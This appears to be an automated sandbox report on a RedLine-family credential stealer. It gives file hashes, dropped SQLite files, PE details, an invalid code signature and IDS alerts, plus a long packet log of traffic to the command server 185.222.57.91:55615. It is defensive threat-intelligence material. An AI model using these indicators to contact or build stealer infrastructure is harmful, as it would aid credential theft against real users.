                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):98304
                      Entropy (8bit):0.08235737944063153
                      Encrypted:false
                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):661000
                      Entropy (8bit):7.703731760214224
                      Encrypted:false
                      SSDEEP:12288:Kqw9IGMwbNVlOVbgRtMNgO6feo001kwahbgoZeSnt8uboW0ekR:DwDb3lOBgR6N7Nj0SwVoZPnt8uboR
                      MD5:05211F48DBBB4EF891DB1E158FF87E28
                      SHA1:20D0D8CEA312FBCA71DD0C00A97A0C346F886628
                      SHA-256:1D614E39746DFC7E2FD8E4D133C5609CE9CC67F80E6468EA189683FCA168CDD6
                      SHA-512:3D6D6480EED39418DF3A86141890120507DBD345BE23FA45472DBC2E6521CBD3553212455CCB8B21051BCBE4151844EFA1FB5DC9936942EC43DDBA7A961D9388
                      Malicious:true
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 68%
                      • Antivirus: Virustotal, Detection: 45%, Browse
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:.f..............0......$......b.... ........@.. ....................... ............@.....................................O........................6........................................................... ............... ..H............text...h.... ...................... ..`.rsrc............ ..................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:true
                      Preview:[ZoneTransfer]....ZoneId=0
                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Entropy (8bit):7.703731760214224
                      TrID:
                      • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                      • Win32 Executable (generic) a (10002005/4) 49.93%
                      • Windows Screen Saver (13104/52) 0.07%
                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                      • Generic Win/DOS Executable (2004/3) 0.01%
                      File name:tfF3UBTdr8.exe
                      File size:661'000 bytes
                      MD5:05211f48dbbb4ef891db1e158ff87e28
                      SHA1:20d0d8cea312fbca71dd0c00a97a0c346f886628
                      SHA256:1d614e39746dfc7e2fd8e4d133c5609ce9cc67f80e6468ea189683fca168cdd6
                      SHA512:3d6d6480eed39418df3a86141890120507dbd345be23fa45472dbc2e6521cbd3553212455ccb8b21051bcbe4151844efa1fb5dc9936942ec43ddba7a961d9388
                      SSDEEP:12288:Kqw9IGMwbNVlOVbgRtMNgO6feo001kwahbgoZeSnt8uboW0ekR:DwDb3lOBgR6N7Nj0SwVoZPnt8uboR
                      TLSH:EAE402A82706D613C9A287B41A71F3F517BC2EDEBC02C21B9EC9ADEF7865F160C50152
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:.f..............0......$......b.... ........@.. ....................... ............@................................
                      Icon Hash:9c306e8c8cb682ac
                      Entrypoint:0x49d562
                      Entrypoint Section:.text
                      Digitally signed:true
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Time Stamp:0x66CD3A1B [Tue Aug 27 02:29:47 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                      Signature Valid:false
                      Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                      Signature Validation Error:The digital signature of the object did not verify
                      Error Number:-2146869232
                      Not Before, Not After
                      • 13/11/2018 01:00:00 09/11/2021 00:59:59
                      Subject Chain
                      • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                      Version:3
                      Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                      Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                      Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                      Serial:7C1118CBBADC95DA3752C46E47A27438
                      Instruction
                      jmp dword ptr [00402000h]
                      Name | Virtual Address | Virtual Size | Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9d510 | 0x4f | .text
                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x9e000 | 0x1de8 | .rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x9e000 | 0x3608 |
                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa0000 | 0xc | .reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                      .text | 0x2000 | 0x9b568 | 0x9b800 | b497288c67b213f2afbcc2a841253daa | False | 0.881082320136656 | data | 7.71081119448831 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rsrc | 0x9e000 | 0x1de8 | 0x2000 | a1c144d286582f221b963d6041b25150 | False | 0.774169921875 | data | 7.338795857363799 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc | 0xa0000 | 0xc | 0x400 | b9918b1deacb5fb173f91ece3d80f2bd | False | 0.025390625 | data | 0.05585530805374581 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                      Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                      RT_ICON | 0x9e160 | 0x1745 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9288232331710593
                      RT_GROUP_ICON | 0x9f8a8 | 0x14 | data | | | 0.9
                      RT_GROUP_ICON | 0x9f8bc | 0x14 | data | | | 1.05
                      RT_VERSION | 0x9f8d0 | 0x32c | data | | | 0.4248768472906404
                      RT_MANIFEST | 0x9fbfc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                      DLL | Import
                      mscoree.dll | _CorExeMain
                      Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
                      2024-08-30T08:02:02.637313+0200 | TCP | 2849662 | ETPRO MALWARE RedLine - CheckConnect Request | 1 | 49711 | 55615 | 192.168.2.5 | 185.222.57.91
                      2024-08-30T08:02:17.981040+0200 | TCP | 2849351 | ETPRO MALWARE RedLine - EnvironmentSettings Request | 1 | 49718 | 55615 | 192.168.2.5 | 185.222.57.91
                      2024-08-30T08:02:11.528172+0200 | TCP | 2849352 | ETPRO MALWARE RedLine - SetEnvironment Request | 1 | 49714 | 55615 | 192.168.2.5 | 185.222.57.91
                      2024-08-30T08:02:20.454579+0200 | TCP | 2045001 | ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound | 1 | 55615 | 49718 | 185.222.57.91 | 192.168.2.5
                      2024-08-30T08:02:20.867312+0200 | TCP | 2849352 | ETPRO MALWARE RedLine - SetEnvironment Request | 1 | 49723 | 55615 | 192.168.2.5 | 185.222.57.91
                      2024-08-30T08:02:18.122869+0200 | TCP | 2046056 | ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) | 1 | 55615 | 49718 | 185.222.57.91 | 192.168.2.5
                      2024-08-30T08:02:11.112782+0200 | TCP | 2045001 | ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound | 1 | 55615 | 49711 | 185.222.57.91 | 192.168.2.5
                      2024-08-30T08:02:07.909323+0200 | TCP | 2045000 | ET MALWARE RedLine Stealer - CheckConnect Response | 1 | 55615 | 49711 | 185.222.57.91 | 192.168.2.5
                      2024-08-30T08:02:12.923279+0200 | TCP | 2849662 | ETPRO MALWARE RedLine - CheckConnect Request | 1 | 49718 | 55615 | 192.168.2.5 | 185.222.57.91
                      2024-08-30T08:02:08.278319+0200 | TCP | 2849351 | ETPRO MALWARE RedLine - EnvironmentSettings Request | 1 | 49711 | 55615 | 192.168.2.5 | 185.222.57.91
                      2024-08-30T08:02:17.772516+0200 | TCP | 2045000 | ET MALWARE RedLine Stealer - CheckConnect Response | 1 | 55615 | 49718 | 185.222.57.91 | 192.168.2.5
                      2024-08-30T08:02:22.423218+0200 | TCP | 2848200 | ETPRO MALWARE RedLine - GetUpdates Request | 1 | 49724 | 55615 | 192.168.2.5 | 185.222.57.91
                      2024-08-30T08:02:08.366718+0200 | TCP | 2046056 | ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) | 1 | 55615 | 49711 | 185.222.57.91 | 192.168.2.5
                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      Aug 30, 2024 08:02:11.580280066 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.580281973 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.580291033 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.580307961 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.580316067 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.580344915 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.580385923 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.580411911 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.580420971 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.580451965 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.580501080 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.580583096 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.580604076 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.580614090 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.580621004 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.580666065 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.580674887 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.580712080 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.580755949 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.580765009 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.580806017 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.580853939 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.580862999 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.580878019 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.580884933 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.580919981 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.583556890 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.583566904 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.583617926 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.583626032 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.583631992 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.583635092 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.583674908 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.583682060 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.583690882 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.583707094 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.583714962 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.583734035 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.583770037 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.583777905 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.583811998 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.583877087 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.583884954 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.583898067 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.583923101 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.583933115 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.583949089 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.583956957 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.583964109 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.583966017 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.583973885 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.583981037 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.583986044 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.583995104 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.583995104 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.584014893 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584016085 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.584023952 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584032059 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584042072 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584045887 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584048033 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.584079981 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.584093094 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584100962 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584104061 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584109068 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584111929 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584137917 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.584170103 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584178925 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584225893 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584233046 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.584233999 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584242105 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584245920 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584307909 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584310055 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.584316015 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584387064 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584394932 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584479094 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584496021 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584503889 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584511042 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584518909 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584522009 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584531069 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584537983 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584537983 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.584592104 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.584597111 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584659100 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584666967 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584670067 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584697962 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584706068 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584708929 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584717989 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584731102 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.584778070 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.584846020 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584855080 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584862947 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584870100 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584873915 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584881067 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584887981 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584896088 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584920883 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584920883 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.584930897 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584939957 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584948063 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584949970 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.584955931 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584964037 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584971905 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584979057 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.584979057 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.584999084 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585007906 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585016012 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585019112 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.585024118 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585046053 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585053921 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585072994 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585073948 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.585114956 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.585122108 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585131884 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585140944 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585150003 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585158110 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585194111 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.585238934 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585249901 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585256100 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585263968 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585314035 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.585340977 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585345984 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.585350037 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585354090 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585361958 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585369110 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585372925 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585378885 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585386992 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585390091 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585397959 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585411072 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.585416079 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585423946 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585428953 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.585433006 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585442066 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585448027 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585484982 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.585496902 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585510969 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585513115 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585514069 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585517883 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585525990 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585532904 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585541964 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.585542917 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585566044 CEST5561549714185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:11.585596085 CEST4971455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:11.585639954 CEST5561549714185.222.57.91192.168.2.5
